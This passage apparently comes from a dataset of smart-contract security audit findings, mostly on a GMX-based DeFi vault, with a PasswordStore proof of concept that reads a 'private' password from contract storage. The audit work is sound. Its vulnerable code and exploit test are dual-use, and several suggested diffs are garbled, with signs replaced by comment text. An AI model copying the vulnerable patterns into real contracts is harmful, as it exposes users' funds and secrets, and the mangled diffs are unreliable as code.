considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n -emergencyResume does not handle the afterDepositCancellation case correctlyчmediumчThe `emergencyResume` function is intended to recover the vault's liquidity following an 
`emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to \"Resume\" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is \"Paused\" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. 
After the cancellation occurs, the vault status is \"Resume\", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not \"Paused\".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to \"Paused\" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.чTo address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.чThe current implementation may result in funds being irretrievably locked within the contract.ч```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = 
self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n -A depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.чmediumчThe fee-minted in the form of shares (svTokens) would not be subtracted from the amount of shares (svTokens) to be minted to the GMXVault's depositor.\\nDue to that, a depositor of the GMXVault could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.\\nWithin the GMXDeposit#deposit(), the GMXVault#mintFee() would be called to mint the fee in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. 
ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of the shares would be minted to the treasury (_store.treasury) in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhen callback of deposit, the the GMXDeposit#processDeposit() would be called via the GMXVault#deposit().\\nWithin the GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) would be minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- 
@audit\\n // rest of code\\n```\\n\\nWithin the GMXDeposit#processDeposit() above, the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() is supposed to be subtracted from the amount of the shares to be minted to the GMXVault's depositor via the GMXDeposit#processDeposit().\\nHowever, there is no logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().чWithin the GMXDeposit#processDeposit(), consider adding a logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().чThe depositor could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.ч```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. 
ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n -Incorrect depositable shortToken amount calculation in Delta neutral vaultsчmediumчWhen calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf `a` user wants to deposit `v` value to `a` `l` leveraged delta neutral vault with token weights `a` and `b`, the calculation of required lending amount would be as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\nчChange the formula to the correct one.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n// Remove the line below\\n// Remove the line 
below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXReader.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXReader.sol\\n@@ // Remove the line below\\n266,8 // Add the line below\\n266,7 @@ library GMXReader {\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n// Remove the line below\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n// Remove the line below\\n // Remove the line below\\n 1e18;\\n// Add the line below\\n / (self.leverage // Remove the line below\\n (self.leverage *_tokenAWeight / SAFE_MULTIPLIER) // Remove the line below\\n 1e18);\\n \\n _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n }\\n```\\nчDeposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.ч```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n -GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.чlowч`GMXOracle` oracle has a function getLpTokenAmount which is in scope. 
This is used in the keeper script to calculate how many LP tokens are required for a given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of 18 as the function assumes.\\nLet's look at the function getLpTokenAmount\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe value returned from the function `_lpTokenValue` is in 18 decimal places. Refer to the line\\nSo the final returned value from the function `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30чGMXOracle.sol#L280: function `getLpTokenAmount` incorrectly assumes that the returned price is in 18 decimal places. 
But it is 30 decimal places.\\nUpdate the function `getLpTokenAmount` as shown below.\\n```\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue; ------ remove\\n\\n return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12); ---- add\\n \\n }\\n```\\nчOverestimating the lpToken amount for the given USD value.ч```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n -`Chainlink.latestRoundData()` may return stale resultsчlowчThe `_getChainlinkResponse()` function is used to get the price of tokens, the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get latest Chainlink response.\\n```\\nfunction 
_getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThe problem is that there is not check for stale data. There are some reasons that the price feed can become stale.чRead the updatedAt return value from the `Chainlink.latestRoundData()` function and verify that is not older than than specific time tolerance.\\n```\\nrequire(block.timestamp - udpatedData < toleranceTime, \"stale price\");\\n```\\nчSince the token prices are used in many contracts, stale data could be catastrophic for the project.ч```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n -USDC is not valued correctly in case of a depeg, which causes a loss of fundsчlowчUSDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a chainlink feed to get prices of a specific 
token. In this case the token of interest is USDC which is a stable coin. Let us get some context for this issue, from the GMX V2 documentation we can read the following:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we now know that gmx will never value USDC below 1$ when closing a short or withdrawing from a position, and that gmx uses the spread from 1 usd to the chainlink price is used. The problem here is that Steadefi does not account for this and will continue to use the chainlink price of usdc in a withdraw and swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)` which gets the current value of a token, for our purpose this token is USDC. 
The problem begins because consult is called by `consultIn18Decimals` and this is called by `convertToUsdValue`, this is then called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. The problems is, as i showed, it will use chainlink value of USDC and in case of a depeg, it will use the depegged value. But as i have shown from gmx docs, when withdrawing, the value of USDC will always be valued at 1 or higher. So now we are calculating slippage for a usdc value that is depegged when we are withdrawing on gmx with the pegged assets normal value.\\nFor example\\nthere is a depeg of usdc\\nusdc chainlink value is $ 0.4\\ngmx withdraw value is always $1\\nbecause we use the chainlink value to calc slippage tolerance, we will be using the slippage tolerance for a USDC price of 0.4 when in fact we are valuing USDC at $1 in gmx. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.чimplement logic specific to stablecoins to handle depegs events. Such would be to always value stable coins at the maximum of the stablecoing proposed value and the chainlink response value. 
Currently we are only using the chainlink response answer to valuate stable coins like usdc, and as i have explained this is a problem.чIn case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.ч```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n -Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalancedчmediumчWhenever A user deposits tokens to vault, vault create a leverage position depending[delta or delta neutral] in the GMX POOl. performing a proportional deposit is not optimal in every case and depositng tokens in such case will result in fewer LP tokens due to sub optimal trade. 
Eventually leading to a loss of gain for the strategy vault\\nAlice deposits token A() into the vault to make Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nvault refer to deposit to GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on GMXManager Library for borrowing assets and making the position IN GMX POOL\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the 
rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it consider the current reserve ratio of the pool and deposits in the same ratio.\\nWhile GMX docs clearly state that If deposits try to create balance in the pool[depositing in such way which will make actual token weight of index Token towards the TOKEN_WEIGHT defined in the pool] will get benefit technically more LP tokens and oppose to this less LP token if current deposits imbalance the Pool reserve the ratio Reference\\nEven Curve pools work in the same way. Depositer get benefit if they try to balance the pool reserve making them optimalчDepositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced\\nconsider implementing check and if the pool is imablanced depositing(making levearge position) towards balancing the Index Token's weight will give optimal returns[extra LP tokens ]чIt is clear that Weight of index token will not be always near equal to the Defined Total_Weight of the Pool. 
So if the pool is imbalanced Depositing into GMXPool will not give optimal returns( resulting in fewer LP token), eventually leading to the loss of gain for the depositers affecting net APRч```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n -The `svTokenValue` function can return overestimated value of each strategy vault share tokenчmediumчThe `GMXReader.svTokenValue` function can return overestimated value of each strategy vault share token due to outdated `totalSupply`, i.e. without including pending management fees for a long period. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about shares value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current amount of `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated. 
The longer the period since the last `mintFee` was called, the more overestimated the share value is.чConsider adding `pendingFee` to the totalSupply:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n// Remove the line below\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n// Add the line below\\n return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ // Add the line below\\n pendingFee(self));\\n } \\n```\\nчThe `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause unexpected protocol behavior while keepers perform rebalancing and when other protocols receive information about the shares value.\\nTools used\\nManual Reviewч```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n -The `afterWithdrawChecks` applies only if user wants to withdraw in tokenA/BчhighчThe `afterWithdrawChecks` check is very important to be sure that important health parameters are in the proper ranges. But the check is inside brackets of the `if user wants to withdraw in tokenA/B` statement. So if the user wants to withdraw the LP token, the check is not performed. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the brackets of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. 
In other cases the `afterWithdrawChecks` check is not provided but should be.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\nчI suppose that the check should be placed after the if statement brackets.чThe issue can cause unexpected financial losses.\\nTools used\\nManual Reviewч```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n -Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyoneчhighчThe protocol is using a `private` state variable to store the owner's password under the assumption that being a "private" variable its value is a secret from everyone else except the owner; which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. 
Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nAforementioned is the `s_password` variable which is being assumed as a secret by the protocol for it being a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note : Though the following code fetches the Victim's password correctly in ASCII format; with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. 
The problem seems to be with how the result of `abi.encodePacked()` for `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq` )\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = \"mySecretPassword\"; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now \"privately\" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by just about everyone on the blockchain who are aware of the Victim's protocol and can access and read the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are alloted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with `-vv` flag to see the `Logs` in command output.чAll data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. 
Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.чThis vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.ч```\\nstring private s_password;\\n```\\n -No check if bridge already existsчlowчIn the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = 